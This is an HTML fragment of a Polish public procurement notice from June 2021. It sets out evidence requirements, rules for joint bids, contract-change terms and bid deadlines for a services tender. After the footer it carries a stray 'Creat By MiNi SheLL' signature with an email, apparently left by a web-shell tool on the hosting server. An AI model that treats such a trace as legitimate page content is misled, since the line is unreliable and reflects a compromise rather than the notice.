kwalifikacji zawodowych nabytych w państwachczłonkowskich Unii Europejskiej (tekst jednolity Dz. U. z 2018 r., poz. 2272) lub posiadać prawodo świadczenia usług transgranicznych zgodnie z ustawą z dnia 15 grudnia 2000 r. osamorządach zawodowych architektów oraz inżynierów budownictwa (Dz. U. z 2019 r., poz.1117 z późn. zm.). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">˜Oświadczenie o aktualności informacji zawartych w oświadczeniu Wykonawcy o brakupodstaw wykluczenia i spełnianiu warunków udziału w postępowaniu, w zakresie podstaw wykluczeniaz postępowania wskazanych przez Zamawiającego.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">˜Wykaz osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień,doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> ˜Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia publicznego. Wprzypadku wspólnego ubiegania się o udzielenie zamówienia: 1. Wykonawcy są zobowiązanido ustanowienia pełnomocnika do reprezentowania ich w postępowaniu albo doreprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.Pełnomocnictwo należy załączyć do oferty. 2. Wszelka korespondencja będzie prowadzonawyłącznie z pełnomocnikiem. 3. Warunek dotyczący uprawnień do prowadzenia określonejdziałalności gospodarczej lub zawodowej zostanie spełniony, jeżeli co najmniej jeden zwykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnieniadoprowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje usługi, doktórych realizacji te uprawnienia są wymagane. 4. W odniesieniu do warunków dotyczącychwykształcenia,kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się oudzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców,którzy wykonająusługi, do realizacji których te zdolności są wymagane. 5. W przypadku, o którym mowa w ust. 3i4,wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają odpowiednio do ofertyoświadczenie, z którego wynikać będzie, które roboty budowlane, dostawy lub usługi wykonająposzczególni wykonawcy. 6. Każdy z Wykonawców wspólnie ubiegających się o udzieleniezamówienia musi złożyć oświadczenie o o braku podstaw wykluczenia i spełnianiu warunkówudziału w postępowaniu. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> ˜Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia określone zostały w projektowanych postanowieniach umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-06-23 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">˜https://platformazakupowa.pl/kamiennagora w zakładce dedykowanej postępowaniu</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-06-23 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-07-22</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-06-14 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com